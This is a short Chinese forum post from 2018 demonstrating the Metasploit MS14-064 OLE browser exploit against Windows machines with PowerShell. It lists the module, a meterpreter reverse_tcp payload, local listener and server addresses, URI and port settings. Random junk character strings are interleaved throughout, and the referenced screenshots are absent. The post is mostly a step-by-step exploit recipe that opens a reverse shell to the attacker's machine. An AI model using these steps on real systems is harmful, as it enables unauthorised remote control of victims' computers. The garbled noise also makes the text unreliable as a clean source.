% [& P$ h( E( z5 v2 F( S4 a; o 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
* A6 q/ I. ~6 @* P/ S
& Z3 n c' p$ t) f3 ]3 w' D; W
. a5 W- ~; U: o3 T; [' x) O 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
( F+ ]5 M( n" t8 f z7 E9 `
, w& s% t3 P3 y6 R, R; R S* s" B3 M
5 Z H" `8 u% [2 O; m
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp- A y4 o. }" Q
/ U/ ]+ G/ K; [) p# r2 v- W
) n# j" n* |' d3 f7 S
set AllowPowershellPrompt true
6 W' f8 Y. f3 Y( M9 M1 w
. {# q- ^0 d5 r1 b+ m% _
9 V; i2 c' y* P, O" g" w( h
Set LHOST 192.168.0.109# `2 V* i2 n0 a1 C, S! Z! f
' |0 T8 k) C5 d4 s
& ^+ M$ q& f9 H" C9 J2 X5 f! p
set SRVHOST 192.168.0.109
`. z6 `" A" F! ?
$ F$ q$ K/ H# n4 }- ~' y; ?% Z
2 S, ^3 j/ f ?) H; Q0 f Set uripath share2 z; d2 C+ d- l% q% ~% ~# A
4 b1 L: ^2 i1 l/ M8 c
* u9 [0 L9 }$ }- B& d; a1 H, {- f4 e
Set srvport 80
! f& L: t3 `6 {# e! J+ U
( V7 x2 {' \& N: _9 {( ~! f7 h3 \/ u
8 R4 n( c9 d# v( m1 H) z. g
# ^, g5 l) Z0 `+ y
+ V6 S3 b1 S+ x/ V1 U ! H. v6 R* m# h- L' D
1 D% E1 t! ?* Q3 _3 T+ D# T* {7 c; w6 A0 l: W
% j& P" m/ y- i
5 g0 I; k+ ~" I& L9 i
i1 @1 c( V) G0 c6 L
; _# w7 ~- ~1 L" }% G
- @4 w, B$ @- m' B
0 b- |3 a# y) L# U, ^, o
# j0 W7 ]8 H2 Z7 s
! v& x. B$ Q3 M( p8 a+ h2 A$ z
, `4 v/ T j9 X/ ~4 P/ D 下面我们来访问本地地址如图:8 V, W: @1 w, W3 F: W
8 p d; s" R4 U0 C9 ?% d
* X; L4 k: A7 V0 `" h7 D/ ?! }2 S
0 f$ v/ S# T) \0 N" F0 B
/ W( @: g$ \" v; {, G' r+ c8 i
: w1 F" ~8 t( G( h: y8 L
1 T2 d$ ^8 K. u$ X; w
, N5 |6 `7 X6 m
_% |6 H3 t4 c, p$ R- C
: k) ^5 x! X$ _/ T5 M
发表于 2018-10-20 20:20:35
收藏
支持
反对